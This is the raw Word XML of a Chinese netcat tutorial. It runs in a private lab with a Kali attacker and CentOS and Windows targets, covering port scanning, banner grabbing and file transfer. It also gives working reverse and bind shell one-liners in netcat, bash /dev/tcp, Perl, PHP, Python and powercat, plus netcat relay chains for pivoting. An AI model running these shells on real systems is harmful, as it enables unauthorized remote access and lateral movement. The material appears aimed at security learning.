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NC工具使用技巧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17" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（By Jean）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/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208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7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/>
              <w:bCs/>
              <w:sz w:val="52"/>
              <w:szCs w:val="7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52"/>
              <w:szCs w:val="72"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="52"/>
              <w:szCs w:val="7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_Toc6529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_Toc6529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_Toc18393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端口扫描</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18393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_Toc13163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端口开放</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13163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_Toc21265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Banner信息获取</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21265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_Toc14970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Web服务交互</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14970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_Toc10464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文件传输</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10464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_Toc18619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7. Netcat正向bind Shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18619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_Toc23862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</w:rPr>
            <w:t>8. Netcat反向reverse shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23862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_Toc25614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9. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>Bash反向shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25614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_Toc24927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10. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>Perl反向shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24927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_Toc22483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11. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>PHP反向shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22483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_Toc32112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12. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:t>Python反向shell</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32112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_Toc13595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13. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>管道输出</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13595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_Toc2630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14. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Netcat联动</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2630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_Toc30004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14.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>方法一</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30004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_Toc6219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14.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>方法二</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6219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/>
              <w:szCs w:val="72"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:szCs w:val="72"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc22989 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:szCs w:val="7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15. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>参考</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22989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  <w:p>
          <w:pPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="52"/>
              <w:szCs w:val="72"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs/>
              <w:szCs w:val="72"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt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0" w:name="_Toc6529"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测试环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0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主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="426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Kali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（攻击机）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192.168.96.129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Centos7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（靶机）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192.168.96.128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Windows10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（靶机）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192.168.96.130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" w:name="_Toc18393"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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root@kali:~# nmap -T4 -A -v 192.168.96.128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029200" cy="3962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root@kali:~# nmap -T4 -A -v 192.168.96.130</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="35598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2" w:name="_Toc13163"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口开放</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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主机名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841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端口开放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Kali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192.168.96.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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Centos7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192.168.96.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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22</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pP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111</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pP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6000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Windows10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192.168.96.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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3389</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pP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5357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_Toc21265"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Banner信息获取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/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root@kali:~# nc 192.168.96.128 22</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2368550" cy="6794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4" w:name="_Toc14970"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web服务交互</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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Netcat还可以通过发出HTTP请求与Web服务器进行交互。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1、在centos7上开启Web服务：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~]# python -m SimpleHTTPServer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Serving HTTP on 0.0.0.0 port 80 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2、kali上使用netcat进行访问</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root@kali:~# nc 192.168.96.128 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HEAD / HTTP/1.0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HTTP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server: SimpleHTTP/0.6 Python/2.7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date: Wed, 04 Nov 2020 02:05:29 GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-type: text/html; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Length: 1396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2889250" cy="1098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root@kali:~# nc 192.168.96.128 80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0650" cy="5289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8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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc10464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件传输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1、新建空白文件/root/file.txt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2、执行 [root@localhost ~]# nc -lvp 8888 &gt;/root/file.txt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76750" cy="18923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Kali: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新建文件/root/file.txt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 nc 192.168.96.128 8888 &lt;/root/file.txt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然后成功将kali攻击机上的file.txt的文件内容 传输到目标主机centos7上。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70150" cy="4635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/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc18619"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Netcat正向bind Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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4940" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="1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Centos7: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[root@localhost ~]# nc -lvp 4444 -e /bin/sh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4013200" cy="952500"/>
            <wp:effectExtent l="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root@kali:~# nc 192.168.96.128 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="1795145"/>
            <wp:effectExtent l="0" t="0" r="10160" b="825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目标主机将Bash shell绑定到端口4444，然后攻击主机使用Netcat连接到该端口，并在获取目标主机的root权限。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  <w:t>实例：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  <w:t>Kali(此时为靶机身份):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root@kali:~/cve-2020-14882/CVE-2020-14882# nc -lvp 4444 -e /bin/sh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listening on [any] 4444 ...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192.168.96.130: inverse host lookup failed: Unknown host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connect to [192.168.96.129] from (UNKNOWN) [192.168.96.130] 56221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  <w:t>Windows10(此时为攻击机身份):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 xml:space="preserve">PS C:\tools\powercat-master\powercat-master&gt; powercat -c 192.168.96.129 -p 4444    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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1361440"/>
            <wp:effectExtent l="0" t="0" r="1079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2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc23862"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Netcat反向reverse shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/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00395" cy="2395855"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="1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Kali: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root@kali:~# nc -lvp 7777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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2275205"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1079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Centos7：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~]# nc 192.168.96.129 7777 -e /bin/sh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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3282950" cy="679450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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目标使用端口</w:t>
      </w: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7777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反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意，我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行（RCE）漏洞</w:t>
      </w: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，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我们可以在目标主机上使用-e发出Netcat命令，并使用Netcat发出命令启动反向shell。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1、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对于Linux</w:t>
      </w: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【靶机上执行】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：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nc 192.168.96.129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  <w:t>（攻击机IP）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 xml:space="preserve"> 4444 -e / bin/bash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ab/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或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nc 192.168.</w:t>
      </w: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96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.1</w:t>
      </w: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29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  <w:t>（攻击机IP）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 xml:space="preserve"> 4444 -e / bin/</w:t>
      </w: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sh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（bash是sh的完整版，bash完全兼容sh命令）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leftChars="0" w:right="0" w:firstLine="0" w:firstLineChars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对于Windows</w:t>
      </w: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【靶机上执行】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nc.exe 192.168.</w:t>
      </w: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96.129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  <w:t xml:space="preserve">（攻击机IP） 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4444 -e cmd.exe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vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>实例：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root@kali:~# nc -lvp 1234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3930650" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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C:\tools\powercat-master\powercat-master&gt; powercat -c 192.168.96.129 -p 1234 -e cmd.exe      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5268595" cy="577850"/>
            <wp:effectExtent l="0" t="0" r="1905" b="635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</w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc25614"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Bash反向shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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Kali主机上执行：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root@kali:~# nc -lvp 1234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4394200" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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Centos7主机上执行：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-i&gt;&amp;/dev/tcp/192.168.96.129/1234 0&gt;&amp;1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Kali主机成功获取shell：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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4248150" cy="2368550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc24927"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Perl反向shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/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可以使用Perl启动一个反向shell。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Kali主机执行：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2571750" cy="273050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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Centos7主机执行(目标主机上运行以下命令来设置反向shell)：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vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>perl -e 'use Socket;$i="192.168.96.129";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'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5271135" cy="459105"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1079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Kali主机成功获取centos7主机的shell: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5269230" cy="2453640"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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Chars="0" w:right="0" w:rightChars="0"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc22483"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP反向shell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当目标主机上存在PHP时，可用这种方式。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Kali主机执行：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root@kali:~# nc -lvp 1234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Centos7主机执行：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-r '$sock=fsockopen("192.168.96.129",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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63855"/>
            <wp:effectExtent l="0" t="0" r="9525" b="444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Kali主机成功获取shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1222375"/>
            <wp:effectExtent l="0" t="0" r="12065" b="952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</w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc32112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python反向shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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Kali主机执行：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root@kali:~# nc -lvp 1234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Centos7主机上执行：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-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.96.129",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'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187325"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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Kali主机成功获取centos7主机的shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4443730"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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2" w:name="_Toc13595"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>管道输出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通过管道使用Netcat端口扫描输出名为output.txt的文件。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Kali主机上执行：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nc -vv -z localhost 1-100 &gt; output.txt 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4984750" cy="5683250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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568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Kali主机上执行：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root@kali:~# nc -vv -z 192.168.96.128 1-65535 &gt; output1.txt 2&gt;&amp;1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49700" cy="869950"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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13" w:name="_Toc2630"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Netcat联动</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc30004"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法一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有三台主机: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kali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192.168.96.129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kali主机与windows10互通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Windows10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192.168.96.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841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假设Windows10与windows7互通，但window7与kali不通。（这里的实际情况是windows7与kali互通）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Window7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192.168.96.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2841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260" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine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即假设我们有2个Windows目标和1个Kali Linux攻击主机。我们已经从Kali Linux机器中盗取了Windows主机1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（如这里的windows10）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，我们希望在Windows主机2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（如这里的windows7）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上获得一个shell，windows主机2只能从Windows主机1访问。我们需要将来自Kali Linux主机的流量定向到Windows主机1，然后再重定向流量到Windows主机2.windows主机2输出流量应该应答到Windows主机1，在windows主机那里流量又将被重定向回到Kali Linux机器。让我们看看下面的图形，以便更好地了解：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47925" cy="2600325"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="35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以下命令按顺序执行。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Kali主机上执行：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root@kali:~# nc -lvp 2222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（输出）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2241550" cy="285750"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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root@kali:~# nc -lvp 3333   （输入）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2000250" cy="292100"/>
            <wp:effectExtent l="0" t="0" r="635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Windows7上执行：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nc -lvp 4444 -e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2559050" cy="311150"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350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Windows10上执行：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nc64.exe 192.168.96.129 3333 | nc64.exe 192.168.96.131 4444 | nc64.exe 192.168.96.129 2222</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="191135"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1206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然后在Kali主机上，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nc -lvp 3333  终端输入whoami后回车（如未成功则回车两次），接着在nc -lvp 2222上查看到成功获取到windows7主机的shell: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9230" cy="2644140"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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661410"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890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bookmarkStart w:id="15" w:name="_Toc6219"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法二</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15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以下命令按顺序执行。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Kali主机执行：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root@kali:~# nc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2114550" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350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Window7上执行：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C:\netcat-win32-1.12&gt;nc -lvp 4444 -e cmd.exe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38550" cy="298450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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Windows10上执行：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nc -v 192.168.96.129 4444 -e "nc -v 192.168.96.131 4444"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35255"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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Kali上成功获取到windows7的shell,此处执行命令如无回显需回车两次。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95850" cy="5562600"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0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Windows7上看到的结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4832350" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0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Windows10上看到的结果：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69595"/>
            <wp:effectExtent l="0" t="0" r="10160" b="19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注：本次实验，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CN"/>
        </w:rPr>
        <w:t>W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indows7可与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CN"/>
        </w:rPr>
        <w:t>K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ali网络互通</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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实战中如遇到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CN"/>
        </w:rPr>
        <w:t>以上假设的网络情况（kali与windows10互通，windows10与windows7互通，kali获取windows7的权限）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可采用这种方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc22989"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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instrText xml:space="preserve"> HYPERLINK "https://www.hackingtutorials.org/networking/hacking-with-netcat-part-1-the-basics/"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https://www.hackingtutorials.org/networking/hacking-with-netcat-part-1-the-basics/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end"/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instrText xml:space="preserve"> HYPERLINK "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/"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https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/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end"/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instrText xml:space="preserve"> HYPERLINK "https://www.hackingtutorials.org/networking/hacking-with-netcat-part-3-advanced-techniques/"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https://www.hackingtutorials.org/networking/hacking-with-netcat-part-3-advanced-techniques/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end"/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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/column/135007.html"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https://www.freebuf.com/column/135007.html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E2486E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A4E248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EAD43C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEAD43C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CC2988AF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC2988AF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6BA029E3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6BA029E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365FA4"/>
    <w:rsid w:val="00765064"/>
